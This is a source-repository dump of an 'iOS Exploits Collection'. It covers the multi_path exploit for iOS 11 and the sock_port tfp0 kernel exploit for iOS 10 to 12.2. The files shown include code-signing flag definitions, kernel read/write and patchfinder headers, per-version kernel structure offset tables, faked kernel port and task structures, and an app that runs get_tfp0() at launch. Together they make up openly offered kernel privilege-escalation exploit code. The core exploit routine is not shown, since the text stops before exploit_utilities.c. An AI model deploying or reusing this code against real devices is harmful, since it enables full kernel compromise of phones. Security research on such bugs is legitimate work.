41 | extern unsigned offsetof_csb_base_offset;
42 | extern unsigned offsetof_csb_entitlements_offset;
43 | extern unsigned offsetof_csb_signer_type;
44 | extern unsigned offsetof_csb_platform_binary;
45 | extern unsigned offsetof_csb_platform_path;
46 |
47 | extern unsigned offsetof_t_flags;
48 |
49 | #define CS_VALID 0x0000001 /* dynamically valid */
50 | #define CS_ADHOC 0x0000002 /* ad hoc signed */
51 | #define CS_GET_TASK_ALLOW 0x0000004 /* has get-task-allow entitlement */
52 | #define CS_INSTALLER 0x0000008 /* has installer entitlement */
53 |
54 | #define CS_HARD 0x0000100 /* don't load invalid pages */
55 | #define CS_KILL 0x0000200 /* kill process if it becomes invalid */
56 | #define CS_CHECK_EXPIRATION 0x0000400 /* force expiration checking */
57 | #define CS_RESTRICT 0x0000800 /* tell dyld to treat restricted */
58 | #define CS_ENFORCEMENT 0x0001000 /* require enforcement */
59 | #define CS_REQUIRE_LV 0x0002000 /* require library validation */
60 | #define CS_ENTITLEMENTS_VALIDATED 0x0004000
61 |
62 | #define CS_ALLOWED_MACHO 0x00ffffe
63 |
64 | #define CS_EXEC_SET_HARD 0x0100000 /* set CS_HARD on any exec'ed process */
65 | #define CS_EXEC_SET_KILL 0x0200000 /* set CS_KILL on any exec'ed process */
66 | #define CS_EXEC_SET_ENFORCEMENT 0x0400000 /* set CS_ENFORCEMENT on any exec'ed process */
67 | #define CS_EXEC_SET_INSTALLER 0x0800000 /* set CS_INSTALLER on any exec'ed process */
68 |
69 | #define CS_KILLED 0x1000000 /* was killed by kernel for invalidity */
70 | #define CS_DYLD_PLATFORM 0x2000000 /* dyld used to load this is a platform binary */
71 | #define CS_PLATFORM_BINARY 0x4000000 /* this is a platform binary */
72 | #define CS_PLATFORM_PATH 0x8000000 /* platform binary by the fact of path (osx only) */
73 |
74 | #define CS_DEBUGGED 0x10000000 /* process is currently or has previously been debugged and allowed to run with invalid pages */
75 | #define CS_SIGNED 0x20000000 /* process has a signature (may have gone invalid) */
76 | #define CS_DEV_CODE 0x40000000 /* code is dev signed, cannot be loaded into prod signed code (will go away with rdar://problem/28322552) */
77 |
78 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path/jelbrek/patchfinder64.h:
--------------------------------------------------------------------------------
1 | #ifndef PATCHFINDER64_H_
2 | #define PATCHFINDER64_H_
3 |
4 | int init_kernel(uint64_t base, const char *filename);
5 | void term_kernel(void);
6 |
7 | // Fun part
8 | uint64_t find_allproc(void);
9 | uint64_t find_add_x0_x0_0x40_ret(void);
10 | uint64_t find_copyout(void);
11 | uint64_t find_bzero(void);
12 | uint64_t find_bcopy(void);
13 | uint64_t find_rootvnode(void);
14 | uint64_t find_trustcache(void);
15 | uint64_t find_amficache(void);
16 |
17 | #endif
18 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path/kmem.h:
--------------------------------------------------------------------------------
1 | #ifndef kmem_h
2 | #define kmem_h
3 |
4 | extern mach_port_t tfp0;
5 |
6 | uint32_t rk32(uint64_t kaddr);
7 | uint64_t rk64(uint64_t kaddr);
8 |
9 | void wk32(uint64_t kaddr, uint32_t val);
10 | void wk64(uint64_t kaddr, uint64_t val);
11 |
12 | #endif
13 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path/main.m:
--------------------------------------------------------------------------------
1 | //
2 | // main.m
3 | // multi_path
4 | //
5 | // Created by Ian Beer on 5/28/18.
6 | // Copyright © 2018 Ian Beer. All rights reserved.
7 | //
8 |
9 | #import
10 | #import "AppDelegate.h"
11 |
12 | int main(int argc, char * argv[]) {
13 | @autoreleasepool {
14 | return UIApplicationMain(argc, argv, nil, NSStringFromClass([AppDelegate class]));
15 | }
16 | }
17 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path/multi_path.entitlements:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | com.apple.developer.networking.multipath
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path/offsets.h:
--------------------------------------------------------------------------------
1 | #ifndef offsets_h
2 | #define offsets_h
3 |
4 | enum kstruct_offset {
5 | /* struct task */
6 | KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,
7 | KSTRUCT_OFFSET_TASK_REF_COUNT,
8 | KSTRUCT_OFFSET_TASK_ACTIVE,
9 | KSTRUCT_OFFSET_TASK_VM_MAP,
10 | KSTRUCT_OFFSET_TASK_NEXT,
11 | KSTRUCT_OFFSET_TASK_PREV,
12 | KSTRUCT_OFFSET_TASK_ITK_SPACE,
13 | KSTRUCT_OFFSET_TASK_BSD_INFO,
14 |
15 | /* struct ipc_port */
16 | KSTRUCT_OFFSET_IPC_PORT_IO_BITS,
17 | KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,
18 | KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,
19 | KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,
20 | KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,
21 | KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,
22 | KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG,
23 | KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,
24 | KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,
25 |
26 | /* struct proc */
27 | KSTRUCT_OFFSET_PROC_PID,
28 | KSTRUCT_OFFSET_PROC_P_FD,
29 |
30 | /* struct filedesc */
31 | KSTRUCT_OFFSET_FILEDESC_FD_OFILES,
32 |
33 | /* struct fileproc */
34 | KSTRUCT_OFFSET_FILEPROC_F_FGLOB,
35 |
36 | /* struct fileglob */
37 | KSTRUCT_OFFSET_FILEGLOB_FG_DATA,
38 |
39 | /* struct socket */
40 | KSTRUCT_OFFSET_SOCKET_SO_PCB,
41 |
42 | /* struct pipe */
43 | KSTRUCT_OFFSET_PIPE_BUFFER,
44 |
45 | /* struct ipc_space */
46 | KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE,
47 | KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE,
48 |
49 | KFREE_ADDR_OFFSET,
50 | };
51 |
52 | int koffset(enum kstruct_offset offset);
53 | void offsets_init(void);
54 |
55 | #endif
56 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path/offsets.m:
--------------------------------------------------------------------------------
1 | #import
2 |
3 | #include
4 | #include
5 | #include
6 | #include
7 | #include
8 |
9 | #include "offsets.h"
10 |
11 | int* offsets = NULL;
12 |
13 | int kstruct_offsets_11_0[] = {
14 | 0xb, // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,
15 | 0x10, // KSTRUCT_OFFSET_TASK_REF_COUNT,
16 | 0x14, // KSTRUCT_OFFSET_TASK_ACTIVE,
17 | 0x20, // KSTRUCT_OFFSET_TASK_VM_MAP,
18 | 0x28, // KSTRUCT_OFFSET_TASK_NEXT,
19 | 0x30, // KSTRUCT_OFFSET_TASK_PREV,
20 | 0x308, // KSTRUCT_OFFSET_TASK_ITK_SPACE
21 | 0x368, // KSTRUCT_OFFSET_TASK_BSD_INFO,
22 |
23 | 0x0, // KSTRUCT_OFFSET_IPC_PORT_IO_BITS,
24 | 0x4, // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,
25 | 0x40, // KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,
26 | 0x50, // KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,
27 | 0x60, // KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,
28 | 0x68, // KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,
29 | 0x88, // KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG,
30 | 0x90, // KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,
31 | 0xa0, // KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,
32 |
33 | 0x10, // KSTRUCT_OFFSET_PROC_PID,
34 | 0x108, // KSTRUCT_OFFSET_PROC_P_FD
35 |
36 | 0x0, // KSTRUCT_OFFSET_FILEDESC_FD_OFILES
37 |
38 | 0x8, // KSTRUCT_OFFSET_FILEPROC_F_FGLOB
39 |
40 | 0x38, // KSTRUCT_OFFSET_FILEGLOB_FG_DATA
41 |
42 | 0x10, // KSTRUCT_OFFSET_SOCKET_SO_PCB
43 |
44 | 0x10, // KSTRUCT_OFFSET_PIPE_BUFFER
45 |
46 | 0x14, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE
47 | 0x20, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE
48 |
49 | 0x6c, // KFREE_ADDR_OFFSET
50 | };
51 |
52 | int kstruct_offsets_11_3[] = {
53 | 0xb, // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,
54 | 0x10, // KSTRUCT_OFFSET_TASK_REF_COUNT,
55 | 0x14, // KSTRUCT_OFFSET_TASK_ACTIVE,
56 | 0x20, // KSTRUCT_OFFSET_TASK_VM_MAP,
57 | 0x28, // KSTRUCT_OFFSET_TASK_NEXT,
58 | 0x30, // KSTRUCT_OFFSET_TASK_PREV,
59 | 0x308, // KSTRUCT_OFFSET_TASK_ITK_SPACE
60 | 0x368, // KSTRUCT_OFFSET_TASK_BSD_INFO,
61 |
62 | 0x0, // KSTRUCT_OFFSET_IPC_PORT_IO_BITS,
63 | 0x4, // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,
64 | 0x40, // KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,
65 | 0x50, // KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,
66 | 0x60, // KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,
67 | 0x68, // KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,
68 | 0x88, // KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG,
69 | 0x90, // KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,
70 | 0xa0, // KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,
71 |
72 | 0x10, // KSTRUCT_OFFSET_PROC_PID,
73 | 0x108, // KSTRUCT_OFFSET_PROC_P_FD
74 |
75 | 0x0, // KSTRUCT_OFFSET_FILEDESC_FD_OFILES
76 |
77 | 0x8, // KSTRUCT_OFFSET_FILEPROC_F_FGLOB
78 |
79 | 0x38, // KSTRUCT_OFFSET_FILEGLOB_FG_DATA
80 |
81 | 0x10, // KSTRUCT_OFFSET_SOCKET_SO_PCB
82 |
83 | 0x10, // KSTRUCT_OFFSET_PIPE_BUFFER
84 |
85 | 0x14, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE
86 | 0x20, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE
87 |
88 | 0x7c, // KFREE_ADDR_OFFSET
89 | };
90 |
91 | int koffset(enum kstruct_offset offset) {
92 | if (offsets == NULL) {
93 | printf("need to call offsets_init() prior to querying offsets\n");
94 | return 0;
95 | }
96 | return offsets[offset];
97 | }
98 |
99 |
100 | void offsets_init() {
101 | if (@available(iOS 11.4, *)) {
102 | printf("this bug is patched in iOS 11.4 and above\n");
103 | exit(EXIT_FAILURE);
104 | } else if (@available(iOS 11.3, *)) {
105 | printf("offsets selected for iOS 11.3 or above\n");
106 | offsets = kstruct_offsets_11_3;
107 | } else if (@available(iOS 11.0, *)) {
108 | printf("offsets selected for iOS 11.0 to 11.2.6\n");
109 | offsets = kstruct_offsets_11_0;
110 | } else {
111 | printf("iOS version too low, 11.0 required\n");
112 | exit(EXIT_FAILURE);
113 | }
114 | }
115 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path/sploit.h:
--------------------------------------------------------------------------------
1 | #ifndef sploit_h
2 | #define sploit_h
3 |
4 | mach_port_t go(void);
5 |
6 | #endif
7 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 12/readme.md:
--------------------------------------------------------------------------------
1 | This is iOS 12 stuff. You may be able to reuse some of it on iOS 13, but don't get your hopes too high.
2 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/readme.md:
--------------------------------------------------------------------------------
1 | Only the most stable one is linked here.
2 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/Makefile:
--------------------------------------------------------------------------------
1 | TARGET = sock_port
2 |
3 | .PHONY: all clean
4 |
5 | all: clean
6 | xcodebuild clean build CODE_SIGN_IDENTITY="" CODE_SIGNING_REQUIRED=NO PRODUCT_BUNDLE_IDENTIFIER="com.jakeashacks.sock-port" -sdk iphoneos -configuration Debug
7 | ln -sf build/Debug-iphoneos Payload
8 | zip -r9 $(TARGET).ipa Payload/$(TARGET).app
9 |
10 | clean:
11 | rm -rf build Payload $(TARGET).ipa
12 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/README.md:
--------------------------------------------------------------------------------
1 | # sock_port
2 |
3 | iOS 10.0-12.2 (+12.4) tfp0 for all devices (in theory).
4 |
5 | Some info:
6 | - Uses socket bug by Ned Williamson
7 | - Uses some things by Ian Beer, machswap, SockPuppet
8 | - The rest of the code is licensed under GPL, unless given permission explicitly to distribute closed-source (the unc0ver team, pwn20wnd and sbingner, have this permission)
9 |
10 | Write-up: https://raw.githubusercontent.com/jakeajames/sock_port/master/sock_port.pdf
11 |
12 | Thanks to Pwn20wnd and GeoSn0w & users for helping with testing on multiple devices (and Corellium).
13 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/GeoSn0w/OpenJailbreak/0acf2c4ea664c3cffb3492fae566838c2ba9abfd/iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port.pdf
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port.xcodeproj/project.xcworkspace/contents.xcworkspacedata:
--------------------------------------------------------------------------------
1 |
2 |
4 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | IDEDidComputeMac32BitWarning
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port.xcodeproj/project.xcworkspace/xcuserdata/jakejames.xcuserdatad/UserInterfaceState.xcuserstate:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/GeoSn0w/OpenJailbreak/0acf2c4ea664c3cffb3492fae566838c2ba9abfd/iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port.xcodeproj/project.xcworkspace/xcuserdata/jakejames.xcuserdatad/UserInterfaceState.xcuserstate
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port.xcodeproj/project.xcworkspace/xcuserdata/pwn20wnd.xcuserdatad/UserInterfaceState.xcuserstate:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/GeoSn0w/OpenJailbreak/0acf2c4ea664c3cffb3492fae566838c2ba9abfd/iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port.xcodeproj/project.xcworkspace/xcuserdata/pwn20wnd.xcuserdatad/UserInterfaceState.xcuserstate
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port.xcodeproj/xcshareddata/xcschemes/sock_port.xcscheme:
--------------------------------------------------------------------------------
1 |
2 |
5 |
8 |
9 |
15 |
21 |
22 |
23 |
24 |
25 |
30 |
31 |
33 |
39 |
40 |
41 |
43 |
49 |
50 |
51 |
52 |
53 |
59 |
60 |
61 |
62 |
63 |
64 |
74 |
76 |
82 |
83 |
84 |
85 |
86 |
87 |
93 |
95 |
101 |
102 |
103 |
104 |
106 |
107 |
110 |
111 |
112 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port.xcodeproj/xcuserdata/jakejames.xcuserdatad/xcdebugger/Breakpoints_v2.xcbkptlist:
--------------------------------------------------------------------------------
1 |
2 |
5 |
6 |
8 |
20 |
21 |
22 |
24 |
36 |
37 |
38 |
40 |
52 |
53 |
54 |
55 |
56 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port.xcodeproj/xcuserdata/jakejames.xcuserdatad/xcschemes/xcschememanagement.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | SchemeUserState
6 |
7 | socket_free.xcscheme
8 |
9 | orderHint
10 | 0
11 |
12 |
13 |
14 |
15 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port.xcodeproj/xcuserdata/pwn20wnd.xcuserdatad/xcschemes/xcschememanagement.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | SchemeUserState
6 |
7 | sock_port.xcscheme_^#shared#^_
8 |
9 | orderHint
10 | 0
11 |
12 |
13 | SuppressBuildableAutocreation
14 |
15 | 82F179EB22DF4ED700231F8C
16 |
17 | primary
18 |
19 |
20 | 82F17A0322DF4ED800231F8C
21 |
22 | primary
23 |
24 |
25 | 82F17A0E22DF4ED800231F8C
26 |
27 | primary
28 |
29 |
30 |
31 |
32 |
33 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port/AppDelegate.h:
--------------------------------------------------------------------------------
1 | //
2 | // AppDelegate.h
3 | // sock_port
4 | //
5 | // Created by Jake James on 7/17/19.
6 | // Copyright © 2019 Jake James. All rights reserved.
7 | //
8 |
9 | #import
10 |
11 | @interface AppDelegate : UIResponder
12 |
13 | @property (strong, nonatomic) UIWindow *window;
14 |
15 |
16 | @end
17 |
18 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port/AppDelegate.m:
--------------------------------------------------------------------------------
1 | //
2 | // AppDelegate.m
3 | // sock_port
4 | //
5 | // Created by Jake James on 7/17/19.
6 | // Copyright © 2019 Jake James. All rights reserved.
7 | //
8 |
9 | #import "AppDelegate.h"
10 | #include "exploit.h"
11 |
12 | @interface AppDelegate ()
13 |
14 | @end
15 |
16 | @implementation AppDelegate
17 |
18 |
19 | - (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions {
20 | mach_port_t tfp0 = get_tfp0();
21 | return YES;
22 | }
23 |
24 |
25 | - (void)applicationWillResignActive:(UIApplication *)application {
26 | // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state.
27 | // Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game.
28 | }
29 |
30 |
31 | - (void)applicationDidEnterBackground:(UIApplication *)application {
32 | // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later.
33 | // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits.
34 | }
35 |
36 |
37 | - (void)applicationWillEnterForeground:(UIApplication *)application {
38 | // Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background.
39 | }
40 |
41 |
42 | - (void)applicationDidBecomeActive:(UIApplication *)application {
43 | // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface.
44 | }
45 |
46 |
47 | - (void)applicationWillTerminate:(UIApplication *)application {
48 | // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:.
49 | }
50 |
51 |
52 | @end
53 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port/Assets.xcassets/AppIcon.appiconset/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 | "images" : [
3 | {
4 | "idiom" : "iphone",
5 | "size" : "20x20",
6 | "scale" : "2x"
7 | },
8 | {
9 | "idiom" : "iphone",
10 | "size" : "20x20",
11 | "scale" : "3x"
12 | },
13 | {
14 | "idiom" : "iphone",
15 | "size" : "29x29",
16 | "scale" : "2x"
17 | },
18 | {
19 | "idiom" : "iphone",
20 | "size" : "29x29",
21 | "scale" : "3x"
22 | },
23 | {
24 | "idiom" : "iphone",
25 | "size" : "40x40",
26 | "scale" : "2x"
27 | },
28 | {
29 | "idiom" : "iphone",
30 | "size" : "40x40",
31 | "scale" : "3x"
32 | },
33 | {
34 | "idiom" : "iphone",
35 | "size" : "60x60",
36 | "scale" : "2x"
37 | },
38 | {
39 | "idiom" : "iphone",
40 | "size" : "60x60",
41 | "scale" : "3x"
42 | },
43 | {
44 | "idiom" : "ipad",
45 | "size" : "20x20",
46 | "scale" : "1x"
47 | },
48 | {
49 | "idiom" : "ipad",
50 | "size" : "20x20",
51 | "scale" : "2x"
52 | },
53 | {
54 | "idiom" : "ipad",
55 | "size" : "29x29",
56 | "scale" : "1x"
57 | },
58 | {
59 | "idiom" : "ipad",
60 | "size" : "29x29",
61 | "scale" : "2x"
62 | },
63 | {
64 | "idiom" : "ipad",
65 | "size" : "40x40",
66 | "scale" : "1x"
67 | },
68 | {
69 | "idiom" : "ipad",
70 | "size" : "40x40",
71 | "scale" : "2x"
72 | },
73 | {
74 | "idiom" : "ipad",
75 | "size" : "76x76",
76 | "scale" : "1x"
77 | },
78 | {
79 | "idiom" : "ipad",
80 | "size" : "76x76",
81 | "scale" : "2x"
82 | },
83 | {
84 | "idiom" : "ipad",
85 | "size" : "83.5x83.5",
86 | "scale" : "2x"
87 | }
88 | ],
89 | "info" : {
90 | "version" : 1,
91 | "author" : "xcode"
92 | }
93 | }
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port/Base.lproj/LaunchScreen.storyboard:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port/Base.lproj/Main.storyboard:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port/Info.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | CFBundleDevelopmentRegion
6 | $(DEVELOPMENT_LANGUAGE)
7 | CFBundleExecutable
8 | $(EXECUTABLE_NAME)
9 | CFBundleIdentifier
10 | $(PRODUCT_BUNDLE_IDENTIFIER)
11 | CFBundleInfoDictionaryVersion
12 | 6.0
13 | CFBundleName
14 | $(PRODUCT_NAME)
15 | CFBundlePackageType
16 | APPL
17 | CFBundleShortVersionString
18 | 1.0
19 | CFBundleVersion
20 | 1
21 | LSRequiresIPhoneOS
22 |
23 | UILaunchStoryboardName
24 | LaunchScreen
25 | UIMainStoryboardFile
26 | Main
27 | UIRequiredDeviceCapabilities
28 |
29 | armv7
30 |
31 | UISupportedInterfaceOrientations
32 |
33 | UIInterfaceOrientationPortrait
34 | UIInterfaceOrientationLandscapeLeft
35 | UIInterfaceOrientationLandscapeRight
36 |
37 | UISupportedInterfaceOrientations~ipad
38 |
39 | UIInterfaceOrientationPortrait
40 | UIInterfaceOrientationPortraitUpsideDown
41 | UIInterfaceOrientationLandscapeLeft
42 | UIInterfaceOrientationLandscapeRight
43 |
44 |
45 |
46 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port/ViewController.h:
--------------------------------------------------------------------------------
1 | //
2 | // ViewController.h
3 | // sock_port
4 | //
5 | // Created by Jake James on 7/17/19.
6 | // Copyright © 2019 Jake James. All rights reserved.
7 | //
8 |
9 | #import
10 |
11 | @interface ViewController : UIViewController
12 |
13 |
14 | @end
15 |
16 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port/ViewController.m:
--------------------------------------------------------------------------------
1 | //
2 | // ViewController.m
3 | // sock_port
4 | //
5 | // Created by Jake James on 7/17/19.
6 | // Copyright © 2019 Jake James. All rights reserved.
7 | //
8 |
9 | #import "ViewController.h"
10 |
11 | @interface ViewController ()
12 |
13 | @end
14 |
15 | @implementation ViewController
16 |
17 | - (void)viewDidLoad {
18 | [super viewDidLoad];
19 | // Do any additional setup after loading the view, typically from a nib.
20 | }
21 |
22 |
23 | - (void)didReceiveMemoryWarning {
24 | [super didReceiveMemoryWarning];
25 | // Dispose of any resources that can be recreated.
26 | }
27 |
28 |
29 | @end
30 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port/exploit.h:
--------------------------------------------------------------------------------
1 | //
2 | // exploit.h
3 | // sock_port
4 | //
5 | // Created by Jake James on 7/17/19.
6 | // Copyright © 2019 Jake James. All rights reserved.
7 | //
8 |
9 | #ifndef exploit_h
10 | #define exploit_h
11 |
12 |
13 | #include
14 | #include
15 | #include
16 | #include
17 | #include
18 | #include
19 |
20 | #include "exploit_utilities.h"
21 | #include "kernel_memory.h"
22 |
23 | #define IPV6_USE_MIN_MTU 42
24 | #define IPV6_PKTINFO 46
25 | #define IPV6_PREFER_TEMPADDR 63
26 |
27 | struct route_in6 {
28 | struct rtentry *ro_rt;
29 | struct llentry *ro_lle;
30 | struct ifaddr *ro_srcia;
31 | uint32_t ro_flags;
32 | struct sockaddr_in6 ro_dst;
33 | };
34 |
35 | struct ip6po_rhinfo {
36 | struct ip6_rthdr *ip6po_rhi_rthdr; /* Routing header */
37 | struct route_in6 ip6po_rhi_route; /* Route to the 1st hop */
38 | };
39 |
40 | struct ip6po_nhinfo {
41 | struct sockaddr *ip6po_nhi_nexthop;
42 | struct route_in6 ip6po_nhi_route; /* Route to the nexthop */
43 | };
44 |
45 | struct ip6_pktopts {
46 | struct mbuf *ip6po_m;
47 | int ip6po_hlim;
48 | struct in6_pktinfo *ip6po_pktinfo;
49 | struct ip6po_nhinfo ip6po_nhinfo;
50 | struct ip6_hbh *ip6po_hbh;
51 | struct ip6_dest *ip6po_dest1;
52 | struct ip6po_rhinfo ip6po_rhinfo;
53 | struct ip6_dest *ip6po_dest2;
54 | int ip6po_tclass;
55 | int ip6po_minmtu;
56 | int ip6po_prefer_tempaddr;
57 | int ip6po_flags;
58 | };
59 |
60 | #define IO_BITS_ACTIVE 0x80000000
61 | #define IOT_PORT 0
62 | #define IKOT_TASK 2
63 | #define IKOT_CLOCK 25
64 | #define IKOT_IOKIT_CONNECT 29
65 |
66 | typedef volatile struct {
67 | uint32_t ip_bits;
68 | uint32_t ip_references;
69 | struct {
70 | uint64_t data;
71 | uint64_t type;
72 | } ip_lock; // spinlock
73 | struct {
74 | struct {
75 | struct {
76 | uint32_t flags;
77 | uint32_t waitq_interlock;
78 | uint64_t waitq_set_id;
79 | uint64_t waitq_prepost_id;
80 | struct {
81 | uint64_t next;
82 | uint64_t prev;
83 | } waitq_queue;
84 | } waitq;
85 | uint64_t messages;
86 | uint32_t seqno;
87 | uint32_t receiver_name;
88 | uint16_t msgcount;
89 | uint16_t qlimit;
90 | uint32_t pad;
91 | } port;
92 | uint64_t klist;
93 | } ip_messages;
94 | uint64_t ip_receiver;
95 | uint64_t ip_kobject;
96 | uint64_t ip_nsrequest;
97 | uint64_t ip_pdrequest;
98 | uint64_t ip_requests;
99 | uint64_t ip_premsg;
100 | uint64_t ip_context;
101 | uint32_t ip_flags;
102 | uint32_t ip_mscount;
103 | uint32_t ip_srights;
104 | uint32_t ip_sorights;
105 | } kport_t;
106 |
107 | typedef struct {
108 | struct {
109 | uint64_t data;
110 | uint32_t reserved : 24,
111 | type : 8;
112 | uint32_t pad;
113 | } lock; // mutex lock
114 | uint32_t ref_count;
115 | uint32_t active;
116 | uint32_t halting;
117 | uint32_t pad;
118 | uint64_t map;
119 | } ktask_t;
120 |
121 | #define WQT_QUEUE 0x2
122 | #define _EVENT_MASK_BITS ((sizeof(uint32_t) * 8) - 7)
123 |
124 | union waitq_flags {
125 | struct {
126 | uint32_t /* flags */
127 | waitq_type:2, /* only public field */
128 | waitq_fifo:1, /* fifo wakeup policy? */
129 | waitq_prepost:1, /* waitq supports prepost? */
130 | waitq_irq:1, /* waitq requires interrupts disabled */
131 | waitq_isvalid:1, /* waitq structure is valid */
132 | waitq_turnstile_or_port:1, /* waitq is embedded in a turnstile (if irq safe), or port (if not irq safe) */
133 | waitq_eventmask:_EVENT_MASK_BITS;
134 | };
135 | uint32_t flags;
136 | };
137 |
138 |
139 | mach_port_t get_tfp0(void);
140 |
141 | #endif /* exploit_h */
142 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port/exploit_utilities.c:
